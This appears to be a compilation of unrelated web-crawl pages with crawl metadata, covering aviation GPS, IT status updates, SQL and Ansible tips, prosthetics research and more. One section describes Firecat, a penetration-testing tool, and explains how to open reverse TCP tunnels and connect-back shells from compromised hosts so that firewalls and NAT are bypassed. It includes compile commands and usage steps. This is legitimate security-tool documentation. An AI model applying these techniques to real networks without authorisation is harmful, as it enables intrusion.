s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947475422.71/warc/CC-MAIN-20240301161412-20240301191412-00654.warc.gz
0.901489
859
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__40517471
en
Featuring a modern yet rugged design, the aera 760 is an all-in-one aviation portable complete with a built-in GPS/GLONASS receiver that is optimized for the cockpit. Its bright, 7-inch sunlight readable display can run on battery power for up to four hours on a single charge. Along the bezel, an industry-standard USB-C connection is used to charge and power the aera 760, while a microSD card slot allows pilots to load topography and street maps or use it to easily transfer user waypoints. The aera 760 features an intuitive user-interface resembling that of many other popular Garmin products such as the GTN Xi series,G3X Touch and Garmin Pilot allowing pilots to easily transition between multiple Garmin products in the cockpit. Capable of operating in harsh conditions, the aera 760 has also been tested and hardened to meet stringent temperature and vibration standards. Built-in Wi-Fi and Bluetooth allow the aera 760 to take advantage of Garmin Connext wireless connectivity inside and outside of the cockpit. When connected to Wi-Fi, pilots can easily download aviation database and software updates without the need to physically connect it to a computer. Prior to departure, pilots can also view worldwide weather information on the aera 760 when it’s connected to Wi-Fi. In the cockpit, it is capable of wirelessly connecting to select products such as the GTX 345 or the GDL 52 to display the benefits of Automatic Dependent Surveillance-Broadcast (ADS-B) traffic, Flight Information Service-Broadcast (FIS-B) weather, SiriusXM aviation weather and more via Bluetooth. Exclusive features such as TerminalTraffic and TargetTrend can also be viewed on the moving map and dedicated traffic pages. Pilots can hard-wire the aera 760’s power, audio and dual RS-232 connections to receive additional benefits. When connected to a navigator such as the GTN 650Xi/750Xi, GTN 650/750 or the GNS 430W/530W, the aera 760 can send and receive flight plan data that is entered into the navigator over a serial port so all products remain synchronized throughout the flight. It is also capable of wirelessly connecting to these navigators when paired with a Flight Stream 210/510. When connected to a NAV/COM such as the GTR 225, GNC 255 or GTR 200, frequencies and airport identifiers can also be transferred from the aera 760 to the corresponding NAV/COM. For aircraft flying in visual conditions, pilots can optionally connect the aera 760 to select autopilots to fly lateral GPS and single point vertical navigation (VNAV) guidance. For example, pilots flying in visual conditions can fly a VNAV profile from their current altitude to pattern altitude using the aera 760 fully coupled to the autopilot. 3D Vision technology displays a virtual 3D perspective view of surrounding terrain, obstacles and airports, as well as a horizontal situation indicator (HSI) that is capable of showing lateral and vertical deviation bars. When the aera 760 is panel mounted or paired with a compatible attitude source such as a GDL 52 or GTX 345, pilots can view synthetic vision (SVX), which adds the display of back-up attitude information on the portable. The aera 760 also features fuel price information, an E6B flight computer and weight and balance calculators. The E6B can be used prior to a flight to aid in calculating fuel burn, estimated time of arrival (ETA) and more. While in-flight, the aera 760 utilizes ground speed information to recalculate fuel burn and ETA. Helicopter operators also have access to features tailored to their unique operations, such as WireAware wire-strike avoidance technology. WireAware overlays power line locations and relative altitude information on the moving map and provides both aural and visual alerting when operating near power lines. Pilots also have the option to enter street intersections or non-aviation waypoints. GPS altitude display is offered in both mean sea level (MSL) and above ground level (AGL), so they are easier to identify relative to the aircraft flight path.
systems_science
https://resources.bishopfox.com/resources/tools/other-free-tools/firecat/
2024-04-22T13:57:26
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296818293.64/warc/CC-MAIN-20240422113340-20240422143340-00282.warc.gz
0.881432
1,479
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__182371619
en
Firecat is a penetration testing tool that allows you to punch reverse TCP tunnels out of a compromised network. After a tunnel is established, you can connect from an external host to any port on any system inside the compromised network, even if the network is behind a NAT gateway and/or strict firewall. This can be useful for a number of purposes, including gaining Remote Desktop access to the internal network NAT’d IP address (e.g. 192.168.1.10) of a compromised web server. Firecat is written in C and has been tested on Linux, Solaris, iOS, Mac OS X, and Windows XP/Vista/2k/2k3/2k8. - To compile on Windows using MinGW: - gcc –o firecat.exe firecat.c –lwsock32 - To compile on Unix: - gcc –o firecat firecat.c How does it work? Flashback a decade or so and you will recall that it was common to find hosts that were not firewalled properly (or at all) from the Internet. You could compromise a host, bind shellcode to a port, and use netcat or some other tool to take interactive command-line control of the target. These days things are different. It is often the case that TCP/IP packets destined for a host are strictly filtered by ingress firewall rules. Often matters are further complicated by the fact that the target host is located behind a NAT gateway: Tight firewall rules reduce the attack surface of the target environment, but attacks such as SQL injection still make it possible to execute arbitrary code on even the most strictly firewalled servers. However, unless the consultant can also take control of the firewall and alter the ruleset, it is impossible to connect directly to internal network services other than those allowed by the firewall. That’s where Firecat comes in to play. Assuming you can execute commands on a host in a DMZ and further assuming that the host can initiate outbound TCP/IP connections to the consultant’s computer, Firecat makes it possible for the consultant to connect to any port on the target host, and often any port on any host inside the DMZ. It does this by creating a reverse TCP tunnel through the firewall and using the tunnel to broker arbitrary TCP connections between the consultant and hosts in the target environment. In addition to creating arbitrary TCP/IP tunnels into DMZ networks, it can also be used to pop connect-back shells from compromised DMZ hosts such as web or SQL servers. It works because the target system is the one that initiates the TCP connection back to the consultant, not the other way around. Firecat runs in “target” mode on the target, and “consultant” mode on the consultant’s system, effectively creating a tunnel between the two endpoints. Once the tunnel is established, the consultant connects to their local Firecat daemon which instructs the remote Firecat daemon to initiate a connection to the desired host/port behind the firewall. The two Firecat daemons then tunnel the data between the consultant and the target to create a seamless, transparent bridge between the two systems; thus completely bypassing the firewall rules. Firecat even works on hosts behind NAT firewalls. Broken down into logical steps, and using the IP addresses in the diagrams, the process works as follows: - Firecat (consultant) listens on 126.96.36.199:4444 - Firecat (target) connects to 188.8.131.52:4444 - A tunnel is established between the two hosts - Firecat (consultant) listens on 184.108.40.206:3389 - Consultant connects a remote desktop client to 220.127.116.11:3389 - Firecat (consultant) tells Firecat (target) that a new session has been started - Firecat (target) connects to 192.168.0.1:3389 - Firecat (target) tells Firecat (consultant) that it’s now connected locally - Both Firecat instances begin to tunnel data between the consultant’s remote desktop client and the target’s remote desktop server, making it appear to the remote desktop client that it is directly connected to the target. Let’s say we want to carry out the tunneling procedure as described in the above diagrams, and connect to the remote desktop service (TCP port 3389) of our target host, an IIS web server. The firewall allows only port 80/TCP to pass from the internet to the target server. The target server has an internal IP address of 192.168.0.1, NAT’d by the firewall. The target is allowed by the firewall to make outbound connections to port 443/TCP on the internet. Our system (18.104.22.168) isn’t firewalled and is directly connected to the internet. First, we start a Firecat daemon on our own system. The “-m 0” flag tells Firecat that we’re running in consultant mode. The “-t 443” flag tells Firecat to listen on port 33 for connections from the compromised target. The “-s 3389” flag tells Firecat to listen on port 3389 for a connection from the consultant; we’ll come to that in a minute. The command line looks like this: We now start a Firecat daemon on the remote system. The -“m 1” flag tells Firecat we’re in target mode, the “-h 22.214.171.124” specifies the IP address of our computer, and “-s 3389” specifies that we’ll be using this tunnel to connect to port 3389 of the compromised web server: Firecat connects from the target to port 443 of our computer. Our Firecat instance notifies us of the incoming connection (the incoming IP address will be that of the target network’s NAT firewall, not the compromised host itself) and Firecat reports that the tunnel has been initialized successfully: At this point, both Firecat instances go to sleep until we start a remote desktop client and connect to localhost:3389. When that happens, the local Firecat informs the remote Firecat, which in turn initiates a connection to the target on port 3389. Data sent from the RDP server is relayed via the Firecat tunnel back to our RDP client, and vice versa. That’s it: we have established a tunnel that allows us to initiate an RDP session with the compromised host behind the NAT firewall. Our local Firecat instance displays the good news: The target end displays: The tunnel is established and the two endpoints communicate transparently via Firecat until either the session is closed by the RDP client or server, or one of the Firecat instances is killed.
systems_science
http://colbycollege.statuspage.io/
2018-01-20T00:42:38
s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084888341.28/warc/CC-MAIN-20180120004001-20180120024001-00345.warc.gz
0.946855
254
CC-MAIN-2018-05
webtext-fineweb__CC-MAIN-2018-05__0__164694409
en
All systems are now operational following the power outage earlier this morning. Any issues believed to be related to this incident should be communicated to ITS Support. Jan 13, 07:14 EST We are investigating a possible issue with the security / ccard system. All other systems are reporting as normal. We will continue to provide updates via http://its-status.colby.edu Jan 13, 07:05 EST All campus network services, including wireless, are now operating again. Some online services are restored while others are still in the process of being restored. We will continue to provide updates as these services are restored. Jan 13, 06:26 EST Power has been restored and systems are being powered back up gradually. We anticipate 20-30 minutes for restoration of critical services. Jan 13, 05:49 EST All IT systems are now offline due to the ongoing campus power outage. Campus telephones are still operating with approximately two hours of reserve power remaining. Jan 13, 05:14 EST The campus is currently experiencing a power outage that is affecting most systems and services. We are monitoring the situation and will continue to provide updates via http://its-status.colby.edu Jan 13, 05:04 EST
systems_science
http://www.chillicious.com/business/huawei-to-launch-5g-chips-and-phones-by-june-2019/
2019-02-21T09:47:55
s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247503844.68/warc/CC-MAIN-20190221091728-20190221113728-00322.warc.gz
0.948004
192
CC-MAIN-2019-09
webtext-fineweb__CC-MAIN-2019-09__0__17574375
en
The Asian iteration of MWC is currently taking place in Shanghai and all big smartphone manufacturers are there. There’s no actual phones coming from the events, but we still get some interesting technology announcements. The latest comes from Huawei, which said it’s planning to introduce 5G chips in March 2019, followed by 5G phones by the end of the following quarter. CEO Eric Xu stated that with the Release 16 of the 3GPP protocol issues with low-latency and massive connectivity will be cleared and the development of 5G networks and services will open up. According to the Mr. Xu, the 5G networks will promote mobile video streaming and other services like Augmented, Virtual and Mixed Reality. To cover demand for such networks, the company will roll out commercial solutions for NSA (non-standalone) networks in September 2018, while standalone platforms like an eventual 5G Kirin SoC will follow by March next year.
systems_science
https://sunday.fudge.org/issues/fudge-sunday-data-portability-742573
2022-05-18T03:55:01
s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662521041.0/warc/CC-MAIN-20220518021247-20220518051247-00097.warc.gz
0.932009
191
CC-MAIN-2022-21
webtext-fineweb__CC-MAIN-2022-21__0__106045452
en
What is data portability? Simply stated, data portability is the means of ensuring that data within a service is not prevented from extraction and reuse independently or with another service. In practice, a simple example might be unstructured data such as a photo service allowing one to download all the individual’s photos associated with that service. In effect, an individual can extract what was placed into a service. For a complex example, imagine a social photo sharing service. In this more complex example, data portability might mean access to similarly unstructured data such as the complete timeline of various photo artifacts in a raw format, social updates or comments relating to those artifacts, and related records relating to the metadata for those artifacts in a variety of open formats (json, html, tgz, zip, or similar archives) that are structured so as to be both accessible and more accessed independently with generally available software or for import to another service.
systems_science
https://support.xfusion.com/server-simulators/index_en.html
2023-06-03T18:00:50
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224649302.35/warc/CC-MAIN-20230603165228-20230603195228-00446.warc.gz
0.845706
1,030
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__72260236
en
|Server iBMC Simulator||V600 V300|| The iBMC is a proprietary intelligent management system that remotely manages servers.The iBMC complies with Intelligent Platform Management Interface (IPMI) standards and Simple Network Management Protocol (SNMP). It provides various functions, including keyboard, video, and mouse (KVM) redirection, text console redirection, remote virtual media, and reliable hardware monitoring and management. |Server Purley BIOS Simulator|| The Purley-based servers use proprietary BIOS developed based on Insyde code base. The BIOS provides a variety of in-band and out-of-band configuration functions. It is scalable and can be easily customized to a variety of setups. |Server Whitley BIOS Simulator||The Whitley-based servers use the BIOS developed based on the code bases of Independent BIOS Vendors (IBVs). BIOS provides a variety of in-band and out-of-band configuration functions. It is scalable and can be easily customized to a variety of setups.| |Server CMC Simulator||5.10|| The CMC software manages all the hardware devices of the KunLun 9008, 9016, and 9032 servers. These hardware devices include the following: intelligent Rack Management (iRM) is an intelligent rack management system that supports Redfish specifications. It supports asset locating and management based on U marks, sensor monitoring in the rack, and reliable monitoring and management of power supplies and batteries. FusionDirector enables unified server hardware O&M management. Public cloud and enterprise customers can use FusionDirector to achieve simple and efficient O&M management of servers in each phase of the life cycle. FusionDirector implements visualized management and fault diagnosis for servers, and provides lifecycle management capabilities such as device management, device configuration, firmware upgrade, device monitoring, and OS deployment for servers, helping O&M personnel improve O&M efficiency and reduce O&M costs. |Server Smart Provisioning Simulator||1.5.2|| FusionServer Tools–Smart Provisioning provides a graphical user interface for embedded server configuration, upgrade, and system deployment. With this demo environment, you can perform RAID configuration, firmware upgrade for hard disks, NICs, and RAID controller cards, and OS installation of Windows, RHEL, SLES, VMware ESXi, and CentOS systems. |FusionOne DB Automatic Deployer Simulator||V3.0|| FusionOne DB Automatic Deployer has easy-to-use GUI that simplifies server deployment. FusionOne DB Automatic Deployer provides diverse deployment functions such as OS parameter configuration, OS automatic installation and acceptance, DB automatic deployment and acceptance, and HA automatic deployment and acceptance. Currently, it supports the following deployment scenarios: SLES and SAP HANA openEuler and openGauss RedHat and Oracle |E9000 Server HMM Simulator||V687|| The E9000 server management module MM910 implements central management of the hardware devices in the chassis. MM910 Each E9000 chassis is configured with two MM910s in active/standby mode. The MM910s support active/standby switchovers and hot swap. |FusionOne Center for vSAN||23.0.0|| FusionOne Center is an intelligent management platform built by xFusion. FusionOne Center for vSAN provides hyper-converged infrastructure device management capabilities based on VMware vCenter. The aim is to simplify hyper-converged management processes. The platform combines computing, network, and storage functions to help you run hyper-converged environments with VMware vCenter more efficiently. |FusionOne Center for vSAN Deployment||23.0.0|| FusionOne Center is an intelligent management platform built by xFusion. FusionOne Center for vSAN Deployment provides the capability of creating vSAN clusters based on VMware vCenter. Users can easily initialize vSAN clusters according to the prompts of the navigation page. |FusionOne Center for DB||1.5.0|| FusionOne Center for DB is a full-lifecycle intelligent O&M management software for software and hardware such as systems and DBs. It can implement real-time automatic monitoring for DBs (including HANA DBs, SAP application systems, FusionDB, and Oracle DBs) and their OSs. Once an exception occurs, it notifies the user immediately, significantly improving O&M efficiency and ensuring the reliability of services. It can also monitor alarms on hardware (such as the iBMCs and switches). It supports comprehensive inspection on the running status of device OSs and DBs to detect potential risks in a timely manner and reduce risks.
systems_science
https://impactful.co.za/resources/articles/the-importance-of-writing-efficient-sql-code/
2024-02-28T13:07:40
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474715.58/warc/CC-MAIN-20240228112121-20240228142121-00278.warc.gz
0.878619
631
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__44120359
en
Structured Query Language (SQL) is a widely used programming language for managing and querying relational databases. As databases grow in size and complexity, the efficiency of SQL code becomes crucial in maintaining optimal system performance, responsiveness, and resource utilization. This article will explore the importance of writing efficient SQL code, its benefits, and best practices for optimizing SQL queries to ensure smooth database operations and superior performance. Why Efficient SQL Code Matters - Improved Performance: Optimized SQL queries execute faster and require fewer resources, ensuring better overall database performance and minimizing response times for end-users. - Scalability: Efficient SQL code helps databases scale more effectively to accommodate increased data volumes and user loads, ensuring that performance remains consistent even as demands grow. - Reduced Resource Consumption: Optimized SQL queries consume fewer system resources, such as CPU, memory, and disk space, allowing organizations to maximize the utilization of their existing infrastructure and reduce costs. - Enhanced User Experience: Faster query execution times and reduced resource consumption translate to a better user experience, ensuring that users can access the information they need quickly and without frustration. - Easier Maintenance: Writing efficient SQL code simplifies database maintenance and troubleshooting, as optimized queries are less likely to cause bottlenecks or other performance issues. Best Practices for Writing Efficient SQL Code - Select Only Necessary Data: When writing SQL queries, only request the specific data and columns needed for your task, reducing the amount of data retrieved and processed. - Use Indexes: Leverage database indexes to speed up query execution and improve performance. Ensure that your indexes are well-maintained and updated as needed. - Optimize Joins: Use the appropriate join type for your specific use case and limit the number of joins in a single query, as excessive joins can lead to performance issues. - Use Subqueries Wisely: Subqueries can be powerful tools for breaking down complex queries but should be used judiciously, as they can impact performance if not optimized correctly. Consider using derived tables or common table expressions (CTEs) when appropriate. - Limit the Use of Functions: While functions can simplify SQL code, they can also impact performance if used excessively or inappropriately. Use functions sparingly and consider alternatives when possible. - Optimize Query Execution Plans: Analyze query execution plans to identify potential bottlenecks or inefficiencies, and make adjustments to your SQL code as needed to optimize performance. - Test and Monitor: Continuously test and monitor the performance of your SQL queries, making adjustments as needed to maintain optimal performance and resource utilization. The importance of writing efficient SQL code cannot be overstated, as it plays a critical role in ensuring optimal database performance, scalability, and resource utilization. By following best practices and regularly monitoring query performance, organizations can optimize their SQL code to deliver a superior user experience, maximize infrastructure investments, and simplify database maintenance. Ultimately, investing time and effort into writing efficient SQL code will pay dividends in the long run, enabling organizations to fully leverage the power of their databases and drive business success.
systems_science
https://zitec.com/blog/database-versioning/
2022-01-22T09:03:34
s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320303779.65/warc/CC-MAIN-20220122073422-20220122103422-00039.warc.gz
0.919194
1,063
CC-MAIN-2022-05
webtext-fineweb__CC-MAIN-2022-05__0__220787406
en
While using a code versioning process and pushing the code to the production environment without FTP-ing it is a first step in getting the things right, the immediate thing that you will probably think at, is how to version the database too. This is what we did. And we wanted to be part of the deployment process and also integrated with the development environments. Before jumping in, to develop an in-house tool, I did some (Google)research. What I’ve found was a few proprietary solutions available for MS SQL server, but I haven’t seen any functional tool/solution/script for the open source counterparts like MySQL or PostgreSQL. Some terms first Like with every process, we need some terms when referring to different parts or actions of this process. So, here they are: - baseline – represents the database schema including database objects like: triggers, views, etc; the file is named “xx.yy.zz.sql” - change script – represents a file that contains one ore more SQL commands; the file is named “xx.yy.zz.sql” - test data – represents a minimal test data that should work with the latest baseline and change scripts available; the file is named “data.sql” - z_db_versioning – represents the table that will be created in each versioned database and will hold the current version of the database Notes about revisions: - xx- represents the major no. of database - yy – the minor - zz – the revision point Each project should accommodate, on its repository, the DB versioning directory structure. Each of this files are stored on SVN(or other source control system), just like the usual code does. - the DB versioning related files go under “db” directory(this name is/should be configurable per project) - the baselines are stored under “/db/baselines/” - the change scripts under “/db/change_scripts/” - and the test data here “/db/test_data/” Operations on localhost Localhost is here referred as the developer machine. Every structural change that is about to be applied to the database must be included in one ore more change scripts. It is recommended that a change script to contain a single SQL instruction, rather than a batch of SQL instructions. It is the developer responsibility to commit “compatible” change script to SVN, in the way that the versioning system it is not concerned whether the change script is valid or not. When a certain change script ends up with an error, the system will simply skip it and it cannot be ever executed. Operations on DEV Here is the place where most of the versioning actions take place. Everytime the versioning system is being executed, some particular actions are taking place. - the database is emptied(dropped, then re-created) - the baseline is applied - the change scripts are then applied - finally, the test data is loaded Because we can have multiple developers working on the same code base, on different development branches, and because all of them will need to test their code on the DEV machine, we can end-up with some incompatible database changes from one branch to another. That is why we chose to completely drop and re-create the database in the DB versioning process. The versioning system will search and apply all change scripts that are higher than the latest baseline available on that branch. So, it will ignore the version number found in the z_db_versioning table. In fact this is the only environment where the z_db_versioning is being ignored. Operations on STG Here only the change scripts with the version number higher than DB version are being executed. A change script can be applied only once no matter if it successfully got executed or ended up with a SQL error. While is very less likely to have change scripts running in errors, they are not applied again because they might be incompatible with the rest of the change scripts that were executed in the same batch. Another key aspect of the STG server is that we are using it to generate the baselines whenever the developer/DBA thinks it is necessary. There is a good practice to always keep you database data in sync with the PROD environment to be able to see how the application behaves with the real data set. Operations on PROD Exactly like with the STG environment, only the change scripts with the version number higher than DB version are being executed. Like above, a change script can be applied only once. What is not Before closing this up, there are some things to mention about what DB versioning system is not or what it cannot do: - it is not database backup - it does not version data, but only the database schema and objects(triggers, views, rules, etc) - it cannot revert to a previous DB version; so it is incremental only
systems_science
https://strangeadventures.in/2021/06/17/creating-logical-volumes-with-ansible
2024-04-16T19:17:59
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817106.73/warc/CC-MAIN-20240416191221-20240416221221-00758.warc.gz
0.809044
395
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__76185219
en
Ansible is often overlooked for managing the more physical aspects of the devices it is used to configure, but it has some powerful tools for handling lower level duties, such as disks. Recently I was working on some old-fashioned VMWare virtual machines and discovered that a lot of the guidance for managing logical volumes in Ansible is dated so here are my modernized notes on taking a disk from device to volume. This is NOT a primer on LVM itself, an understanding of LVM is recommended before trying to implement these steps. Create a new logical volume group (docs) - name: Create a volume group on top of /dev/sdb with physical extent size = 32MB community.general.lvg: vg: vg.storage pvs: /dev/sdb1 pesize: 32 Create a logical volume in your logical volume group (docs) - name: create logical volume community.general.lvol: vg: vg.storage lv: data size: 10g Create a filesystem on your new volume (docs) - name: Create a ext4 filesystem on the data volume community.general.filesystem: fstype: ext4 dev: /dev/vg.storage/data Create a folder to mount our new volume to (docs) - name: Create directory /data if does not exist ansible.builtin.file: path: /data state: directory mode: '0755' Mount our new volume to /data (docs) - name: mount the logical volume to /data ansible.posix.mount: path: /data src: /dev/vg.storage/data fstype: ext4 state: mounted These instructions were tested on Ubuntu 20.04 servers with Ansible 2.11 but should work on any Linux flavor that supports LVM.
systems_science
https://www.rips.ca/agri-monitoring
2023-11-28T10:08:08
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679099281.67/warc/CC-MAIN-20231128083443-20231128113443-00468.warc.gz
0.952934
165
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__130324944
en
The is an extremely reliable driveway alarm that is used to detect vehicles only. The probe is buried parallel to the driveway, and will detect vehicles passing by within approximately 10-12 feet. The direct burial cable can be run to a tree or post nearby, where the transmitter box is located. When a vehicle drives by, the transmitter will send a signal to the receiver up to 2500 feet away*. This is ideal in locations where there may be deer or other large animals that would cause false signals with a motion detecting system. Also, because the probe is buried underground, it will be the least noticeable of our wireless systems. The transmitter is weatherproof and meant for exterior locations. Up to four zones can be monitored with additional transmitters. The transmitters can be programmed so they will each sound a different tone at the receiver.
systems_science
https://aiumthescan.blog/tag/mechatronic-hand/
2023-12-01T00:35:50
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100258.29/warc/CC-MAIN-20231130225634-20231201015634-00112.warc.gz
0.929483
1,053
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__176400603
en
Ultrasound technology has continued to be miniaturized at a rapid pace for the past several decades. Recently, handheld smartphone-sized ultrasound systems have emerged and are enabling point-of-care imaging in austere environments and resource-poor settings. With further miniaturization, one can imagine that wearable smartwatch-sized imaging systems may soon be possible. What new opportunities can you imagine with wearable imaging? My research group has been pondering this question for a while, and we have been working on an unexpected application: using ultrasound imaging to sense muscle activity and volitionally control robotic devices. Since antiquity, humans have been working on developing articulated prosthetic devices to replace limbs lost to injury. One of the earliest designs of an articulated mechanical prosthetic hand dates from the Second Punic War (218–201 BC). However, robust and intuitive volitional control of prosthetic hands has been a long-standing challenge that has yet to be adequately solved. Even though significant research investments have led to the development of sophisticated mechatronic hands with multiple degrees of freedom, a large proportion of amputees eventually abandon these devices, often citing limited functionality as a major factor. A major barrier to improving functionality has been the challenge of inferring the intent of the amputee user and to derive appropriate control signals. Inferring the user’s intent has primarily been limited to noninvasively sensing electrical activity of muscles in the residual limbs or more invasive sensing of electrical activity in the brain. Commercial myoelectric prosthetic hands utilize 2 skin-surface electrodes to record electrical activity from the flexor and extensor muscles of the residual stump. To select between multiple grips with just these 2 degrees of freedom, users often have to perform a sequence of non-intuitive maneuvers to select among pre-programmed grips from a menu. This rather unnatural control mechanism significantly limits the potential functionality of these devices for activities of daily living. Recently, systems with multiple electrodes that utilize pattern recognition algorithms to classify the intended grasp end-state from recorded signals have shown promise. However, the ability of amputees to translate end-state classification to intuitive real-time control with multiple degrees of freedom continues to be limited. To address these limitations, invasive strategies, such as implanted myoelectric sensors are being pursued. Another approach, known as targeted muscle reinnervation, involves surgically transferring the residual peripheral nerves from the amputated limb to different intact muscle targets that can function as a biological amplifier of the motor nerve signal. While these invasive strategies have exciting promise, there continues to be a need for better noninvasive sensing. Recently, our research group has demonstrated that ultrasound imaging can be used to resolve the activity of the various muscle compartments in the residual forearm. When amputees imagine volitionally controlling their phantom limb, the innervated residual muscles in the stump contract and this mechanical contraction can be visualized clearly on ultrasound. Indeed, one of the major strengths of ultrasound is the exquisite ability to quantify even minute tissue motion. Contractions of both superficial and deep-seated functional muscle compartments can be spatially resolved enabling high specificity in differentiating between different intended movements. Our research has shown that sonomyography can exceed the grasp classification accuracy of state-of-the-art pattern recognition, and crucially enables intuitive proportional position control by utilizing mechanical deformation of muscles as the control signal. In studies with transradial amputees, we have demonstrated the ability to generate robust control signals and intuitive position-based proportional control across multiple degrees of freedom with very little training, typically just a few minutes. We are now working on miniaturizing this technology to a low-power wearable system with compact electronics that can be incorporated into a prosthetic socket and developing prototype systems that can be tested in clinical trials. The feedback we have received so far from our amputee subjects and clinicians indicates that this ultrasound technology can overcome many of the current challenges in the field, and potentially improve functionality and quality of life of amputee users. Now, if only noninvasive ultrasound neuromodulation can be used to provide haptic and sensory feedback to amputee users in a closed loop ultrasound-based sensing and stimulation system, we will be a step closer to restoring sensorimotor functionality to amputee users, and a grand challenge in the field of neuroprosthetics may be within reach. That will, of course, require some more research. I was attracted to ultrasound research as a graduate student because of the nearly limitless possibilities of ultrasound technology beyond traditional imaging applications. As wearable sensors revolutionize healthcare, perhaps wearable ultrasound may have a role to play. One can only imagine what other novel applications may be enabled as the technology continues to be miniaturized. I think it is an exciting time to be an ultrasound researcher. What new opportunities can you imagine with wearable imaging? Are you working on something using miniaturized ultrasound? Comment below or let us know on Twitter: @AIUM_Ultrasound. Siddhartha Sikdar, PhD, is a Professor in the Bioengineering Department in the Volgenau School of Engineering at George Mason University.
systems_science
https://gsak.net/help/hs47005.htm
2022-01-29T06:58:34
s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320300573.3/warc/CC-MAIN-20220129062503-20220129092503-00614.warc.gz
0.763981
143
CC-MAIN-2022-05
webtext-fineweb__CC-MAIN-2022-05__0__5348033
en
|GSAK (Geocaching Swiss Army Knife)| Force elevation refresh (Right mouse click) Select this option to force the elevation to be refreshed for this waypoint. Even if the elevation is in the local database, GSAK will check the external servers for a more current elevation and use that instead of the local value. As this process can be slow and place demands on the external servers, you can only do one waypoint at a time. This is the only way to refresh the elevation from the external server. Also see the option "Database=>update elevation" Copyright 2004-2019 CWE Computer Services |
systems_science
https://www.uppsalahealthsummit.se/news/News-detail/?tarContentId=1022574
2024-04-21T10:45:53
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817765.59/warc/CC-MAIN-20240421101951-20240421131951-00197.warc.gz
0.940949
1,363
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__165366232
en
Interview with Assem Abu Hatab – the role of smallholder farming systems to end hunger and achieve the SDGs In this interview, we meet Assem Abu Hatab, associate professor at the Department of Economics of SLU and senior development economist at the Nordic Africa Institute (NAI). Assem coordinates the workshop Zero Hunger: Is Smallholder Farming the Solution, one of the workshops presented at the upcoming summit in October. In total, they are six associate professors representing four Swedish research organisations who have been planning and organising the workshop. Erika Chenais and Ylva Persson are affiliated with the National Veterinary Institute (SVA). Klara Fischer is affiliated with the Swedish University of Agricultural Sciences (SLU). Johanna Lindahl is affiliated with SLU, SVA and Uppsala University (UU). Jonas Johansson Wensman is affiliated with SVA and SLU. Smallholder farming is critical to recognise when talking about food system transformations. One can tackle these issues from several angles, e.g. from a political and/or economic perspective, concerning livestock and local versus global markets. What made you choose to design a workshop on this topic? Assem: The idea behind the topic of our workshop originated from our research interests in smallholder farming systems in various settings and contexts. Each of us works on this topic differently: some are interested in small-scale livestock production systems, whereas others are interested in small-scale crop production systems. Some focus on smallholder farming systems in the context of Sweden, Europe and other high-income countries, whilst others focus on these systems in low- and middle-income countries’ contexts. A group of us researches the production and supply-side of the smallholder farming value chain. In contrast, others concentrate more on the demand and consumption stages of the chain. Moreover, we represent a range of research subjects, including social sciences such as economics and rural development, veterinary sciences and agricultural sciences. Thus, I think we complement each other very nicely in terms of our research interests and areas of expertise, which enabled us to work jointly to structure the workshop in an interdisciplinary way that would hopefully attract researchers, policymakers, and international organisations working with agriculture and food systems to participate in our workshop and discuss how we could unlock the potential of smallholder farming systems to contribute more effectively to end hunger and achieve the sustainable development goals. In your opinion, what are the leading public health concerns about food systems, and what needs to be done to achieve sustainable, equitable food systems promoting our health? Well, food systems are inextricably linked to health outcomes. In other words, what we eat (our diets) is one of the most significant drivers of our health and well-being. Decisions about what and how food is produced, processed, packaged, and promoted undermine the quality of what we eat. The outcomes of today's food systems lead to the triple burden of malnutrition, which refers to the coexistence of overnutrition, undernutrition and micronutrient deficiencies. In many low- and middle-income countries, the most nutritious food is often expensive, putting it out of reach for many households. At the same time, unhealthy alternatives are readily available and heavily marketed. Climate change, disease outbreaks and pandemics, conflicts, and other socioeconomic and environmental challenges increase food systems’ fragility. As a result, millions of people around the globe do not have safe and regular access to nutritious food to the extent that famine – which should be consigned to history – looms again. Sadly, two-thirds of children between the ages of 6 months and two years are not getting the diverse diets they need to grow up well, putting them at risk of malnutrition. Food systems are one of the primary drivers of this. Therefore, governments and their development partners and donors need to be more serious about agricultural transformation and set the reform of the sector and agriculture transformation as a top priority. Greater efforts are required to build the productive capacities of food systems, enhance their resilience and preparedness to deal with future shocks, and foster food security and nutrition for the growing populations. To accomplish this, accelerated investment in sustainable agriculture also needs to be leveraged to deliver on a longer-term goal of a more inclusive, environmentally sustainable and resilient food system. What are your expectations for Uppsala Health Summit 2022 and your involvement? The summit takes place this year when many food systems worldwide are still struggling with and trying to recover from the COVID-19 pandemic, which disrupted supply chain activities during the last two years from end to end and posed profound threats to global food security. The invasion of Ukraine earlier this year is another major event that emerged as an additional shock to food systems that threatens to scramble further fragile food supply chains, exacerbate food security challenges, and subsequently derail national and global efforts aiming to achieve SDG #1 (end hunger) and SDG #2 (end poverty). Therefore, the 2022 summit presents a significant and valuable opportunity to exchange views, share ideas, present ongoing research and receive critical feedback from colleagues and stakeholders. In particular, it provides an excellent platform to bring together researchers and stakeholders from diverse disciplines and sectors who are working in areas related to health and agricultural systems and food security to discuss and define research priorities for building more sustainable food systems. Also, I expect the summit to provide a platform for participants to network with peers and gain new insights and collaborations with other researchers interested in similar research areas. Can you tell us about an ‘Aha moment’ you have had in your research? Every time I learn new things and gain an accurate and deep understanding of something is an Aha moment. In recent decades, academic research has become more interdisciplinary as 